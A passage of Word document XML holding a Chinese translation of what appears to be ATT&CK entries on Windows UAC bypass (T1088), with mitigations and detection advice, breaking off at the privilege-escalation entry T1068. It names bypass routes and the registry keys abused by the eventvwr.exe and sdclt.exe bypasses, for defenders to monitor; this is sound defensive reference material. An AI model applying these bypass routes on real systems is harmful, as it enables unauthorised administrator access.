          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以管理员级别权限执行任务。对用户的影响范围由高强制下拒绝操作到允许本地管理员群组中的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>用户</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>执行操作并单击提示或允许用户输入管理员密码来完成操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203FB0E5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果计算机的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>保护级别设置为最高级别以外的任何级别，则允许某些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>indows</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序提升权限或执行某些已提升的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，无需</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通知框提示用户。例如，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>rundll32.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载一个特制的动态链接库（该动态链接库加载一个自动提升的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>COM</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象），并在通常需要提升访问权限的受保护目录中执行文件操作。恶意软件也可能在</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>不提示用户的情况下</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>被注入到受信任的进程中来提升</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。如果目标进程不受保护，则攻击者可以使用这些技术将权限提升到管理员级别。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4671FE2F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>已经发现许多绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的方法。</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UACMe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>相关的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>Github readme</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页面包含一张大清单</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>，列出了许多</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UACMe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中发现和实现的方法，但该</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>清单</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可能并不完整。经常也会发现其他的旁路方法，有的甚至</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是些旁门左道的方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3130DF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eventvwr.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可以自动提升和执行指定的二进制或脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602CAA6F" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果已知具有管理员权限的账号凭据，则可能会有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>其它</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过横向移动技术来绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>方法</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因为</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是一个单一的系统安全机制，一个系统上运行的进程的权限或完整性在横向系统上是未知的而且默认为高完整性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9352D8" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2405"/>
        <w:gridCol w:w="7331"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00B245BB" w14:paraId="0082BA63" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2ADDFF3D" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="219587AD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00B245BB" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B245BB">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1EE7707B" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="323526D5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>审核</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C1F7C11" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>检查</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>W</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>indows</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统上常见的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>旁路漏洞，了解风险状况，并适时解决问题。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="1E985E78" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FD2E7D1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>特权账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>管理</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4913FB31" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>从系统上的本地管理员群组中删除用户。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="722E28EC" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2405" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="566CE900" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>用户账号</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rStyle w:val="af4"/>
                <w:color w:val="auto"/>
              </w:rPr>
              <w:t>控制</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7331" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2B3382D0" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>尽管存在</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>旁路技术，在可能的情况下对</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>UAC</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>使用最高强制级别并且</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>减少</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>使用动态链接库</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>搜索顺序劫持等技术的旁路机会还是</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>很明智的</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6FE4CAE3" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374848B2" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B19B399" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当用户在系统的本地管理员群组中时，有许多方法可以绕过</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，因此可能很难针对所有变数</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>来</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>做检测。应努力减轻影响，收集足够的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旁路</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>前后的</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程启动和行动信息。监控进</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>程</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>API</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>调用来查看</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>是否有</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进程注入以及通过动态链接库搜索顺序劫持技术异常加载动态链接库的行为（这些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>行为旨在获取更高权限来访问进程）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540BD3BD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665"/>
    <w:p w14:paraId="64C6EDDF" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一些</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:t>UAC</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旁路方法依赖于修改特定的、用户可访问的注册表设置。例如：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EA079A6" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>eventvwr.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00B245BB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>旁路使用注册表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKEY_CURRENT_USER]\Software\Classes\mscfile\shell\open\command</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D67B5E4" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="ItemList"/>
        <w:ind w:left="1587" w:hanging="822"/>
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>sdclt.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>旁路使用注册</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>表项</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKEY_CURRENT_USER]\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rStyle w:val="HTML"/>
          <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
          <w:color w:val="000000"/>
          <w:shd w:val="clear" w:color="auto" w:fill="EEEEEE"/>
        </w:rPr>
        <w:t>[HKEY_CURRENT_USER]\Software\Classes\exefile\shell\runas\command\isolatedCommand</w:t>
      </w:r>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="39434C"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB9A478" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析人员应监控这些注册表设置，防止未经授权的更改。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E79C16" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="000F2665">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00671A0D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>提权利用</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="000F2665" w:rsidRPr="00671A0D" w14:paraId="171C14EA" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A5BC1A5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>T1068</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2D20C5FD" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>权限升级</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D5835E1" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C17D0B5" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>系统</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>要求：</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>在权限提升的情况下，攻击者可能已经拥有目标系统权限。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58AE6CAB" w14:textId="77777777" w:rsidR="000F2665" w:rsidRPr="00671A0D" w:rsidRDefault="000F2665" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00671A0D">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>所需权限</w:t>
            </w:r>
            <w:r w:rsidRPr="00671A0D">
              <w:t>：用户</w:t>
            </w:r>
          </w:p>
